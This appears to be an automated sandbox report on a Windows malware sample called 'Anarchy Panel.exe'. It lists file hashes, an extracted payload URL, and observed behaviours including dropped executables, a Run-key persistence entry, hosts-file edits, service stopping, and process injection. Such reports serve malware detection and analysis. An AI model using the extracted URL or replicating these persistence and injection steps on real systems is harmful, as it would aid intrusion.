Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system -
submitted
20-06-2023 00:02
Behavioral task
behavioral1
Sample
Anarchy Panel.exe
Resource
win10v2004-20230220-en
General
-
Target
Anarchy Panel.exe
-
Size
71KB
-
MD5
921b80699829ba456a35ff4a4cc16861
-
SHA1
f01420e7dd677d50763c8344d33549076734682a
-
SHA256
a94809a32eb1cee1f9490410fe9592790fe00802c620b1b881fb0c8815b1efba
-
SHA512
a8d2650a9f7290ddaff5c0b1a842cfd4f473f91f23fc8d7f07294c528eb98cca63a48a5f5552c4bf33465f59b9f74fbc3c9d783064e927e8974ca316893c2bf1
-
SSDEEP
384:A67eCgMkHDsar3lL9O65uJor+1kKQmQhVXZzyM9MpPYAhk5:AFla6/wmhrV2pL
Malware Config
Extracted
https://rentry.org/nipkv/raw
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
d1vnly0k.tkm1.exeupdaters.exedescription pid process target process PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 19 1452 powershell.exe 21 1452 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
d1vnly0k.tkm1.exeupdaters.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts d1vnly0k.tkm1.exe File created C:\Windows\System32\drivers\etc\hosts updaters.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Anarchy Panel.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation Anarchy Panel.exe -
Executes dropped EXE 4 IoCs
Processes:
d1vnly0k.tkm0.exed1vnly0k.tkm1.exed1vnly0k.tkm2.exeupdaters.exepid process 4956 d1vnly0k.tkm0.exe 1496 d1vnly0k.tkm1.exe 848 d1vnly0k.tkm2.exe 2792 updaters.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
d1vnly0k.tkm2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run d1vnly0k.tkm2.exe Set value (str) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " d1vnly0k.tkm2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 10 IoCs
Processes:
svchost.exesvchost.exesvchost.exepowershell.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCPS svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
d1vnly0k.tkm1.exeupdaters.exedescription pid process target process PID 1496 set thread context of 1700 1496 d1vnly0k.tkm1.exe dialer.exe PID 2792 set thread context of 1472 2792 updaters.exe dialer.exe -
Drops file in Program Files directory 1 IoCs
Processes:
d1vnly0k.tkm1.exedescription ioc process File created C:\Program Files\Google\Chrome\updaters.exe d1vnly0k.tkm1.exe -
Launches sc.exe 20 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1076 sc.exe 1424 sc.exe 2732 sc.exe 2064 sc.exe 4596 sc.exe 4452 sc.exe 4044 sc.exe 3604 sc.exe 1580 sc.exe 1448 sc.exe 3308 sc.exe 3432 sc.exe 2796 sc.exe 1344 sc.exe 2284 sc.exe 2164 sc.exe 4632 sc.exe 3564 sc.exe 4980 sc.exe 2964 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2304 3632 WerFault.exe DllHost.exe 4248 3492 WerFault.exe DllHost.exe 1784 4676 WerFault.exe 4476 1120 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies Internet Explorer settings
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 Jun 2023 00:03:31 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Modifies registry class 8 IoCs
Processes:
Explorer.EXEsihost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exed1vnly0k.tkm1.exepowershell.exedialer.exepowershell.exesvchost.exepid process 1452 powershell.exe 1452 powershell.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 3096 powershell.exe 3096 powershell.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1700 dialer.exe 1700 dialer.exe 2308 powershell.exe 2308 powershell.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 3716 svchost.exe 3716 svchost.exe 1700 dialer.exe 1700 dialer.exe 3716 svchost.exe 3716 svchost.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exedialer.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeShutdownPrivilege 2160 powercfg.exe Token: SeCreatePagefilePrivilege 2160 powercfg.exe Token: SeDebugPrivilege 1700 dialer.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeShutdownPrivilege 1932 powercfg.exe Token: SeCreatePagefilePrivilege 1932 powercfg.exe Token: SeShutdownPrivilege 3628 powercfg.exe Token: SeCreatePagefilePrivilege 3628 powercfg.exe Token: SeShutdownPrivilege 4216 powercfg.exe Token: SeCreatePagefilePrivilege 4216 powercfg.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe Token: SeRestorePrivilege 2308 powershell.exe Token: SeShutdownPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeSystemEnvironmentPrivilege 2308 powershell.exe Token: SeRemoteShutdownPrivilege 2308 powershell.exe Token: SeUndockPrivilege 2308 powershell.exe Token: SeManageVolumePrivilege 2308 powershell.exe Token: 33 2308 powershell.exe Token: 34 2308 powershell.exe Token: 35 2308 powershell.exe Token: 36 2308 powershell.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 
powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe Token: SeRestorePrivilege 2308 powershell.exe Token: SeShutdownPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeSystemEnvironmentPrivilege 2308 powershell.exe Token: SeRemoteShutdownPrivilege 2308 powershell.exe Token: SeUndockPrivilege 2308 powershell.exe Token: SeManageVolumePrivilege 2308 powershell.exe Token: 33 2308 powershell.exe Token: 34 2308 powershell.exe Token: 35 2308 powershell.exe Token: 36 2308 powershell.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Anarchy Panel.exepowershell.execmd.exed1vnly0k.tkm1.execmd.exedialer.exelsass.exedescription pid process target process PID 3108 wrote to memory of 1452 3108 Anarchy Panel.exe powershell.exe PID 3108 wrote to memory of 1452 3108 Anarchy Panel.exe powershell.exe PID 3108 wrote to memory of 1452 3108 Anarchy Panel.exe powershell.exe PID 1452 wrote to memory of 4956 1452 powershell.exe d1vnly0k.tkm0.exe PID 1452 wrote to memory of 4956 1452 powershell.exe d1vnly0k.tkm0.exe PID 1452 wrote to memory of 1496 1452 powershell.exe d1vnly0k.tkm1.exe PID 1452 wrote to memory of 1496 1452 powershell.exe d1vnly0k.tkm1.exe PID 1452 wrote to memory of 848 1452 powershell.exe d1vnly0k.tkm2.exe PID 1452 wrote to memory of 848 1452 powershell.exe d1vnly0k.tkm2.exe PID 1844 wrote to memory of 4452 1844 cmd.exe sc.exe PID 1844 wrote to memory of 4452 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1076 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1076 1844 cmd.exe sc.exe PID 1844 wrote to memory of 2164 1844 cmd.exe sc.exe PID 1844 wrote to memory of 2164 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1424 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1424 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1448 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1448 1844 cmd.exe sc.exe PID 1496 wrote to memory of 1700 1496 d1vnly0k.tkm1.exe dialer.exe PID 3344 wrote to memory of 2160 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 2160 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 1932 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 1932 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 3628 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 3628 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 4216 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 4216 3344 cmd.exe powercfg.exe PID 1700 wrote to memory of 624 1700 dialer.exe winlogon.exe PID 1700 wrote to memory of 684 1700 dialer.exe lsass.exe PID 1700 wrote to memory of 964 1700 dialer.exe 
svchost.exe PID 1700 wrote to memory of 380 1700 dialer.exe dwm.exe PID 1700 wrote to memory of 408 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 672 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1036 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1052 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1128 1700 dialer.exe svchost.exe PID 684 wrote to memory of 2600 684 lsass.exe sysmon.exe PID 1700 wrote to memory of 1208 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1228 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1324 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1360 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1408 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1428 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1440 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1556 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1588 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1660 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1676 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1772 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1808 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1852 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1868 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1968 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1976 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2044 1700 dialer.exe spoolsv.exe PID 1700 wrote to memory of 2076 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2136 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2316 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2324 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2424 1700 dialer.exe sihost.exe PID 1700 wrote to memory of 2452 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2496 1700 dialer.exe OfficeClickToRun.exe PID 1700 wrote to memory of 2512 1700 
dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1128 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2580
-
C:\Program Files\Google\Chrome\updaters.exe"C:\Program Files\Google\Chrome\updaters.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2792 -
C:\Program Files\Google\Chrome\updaters.exe"C:\Program Files\Google\Chrome\updaters.exe"2⤵PID:4500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2136
-
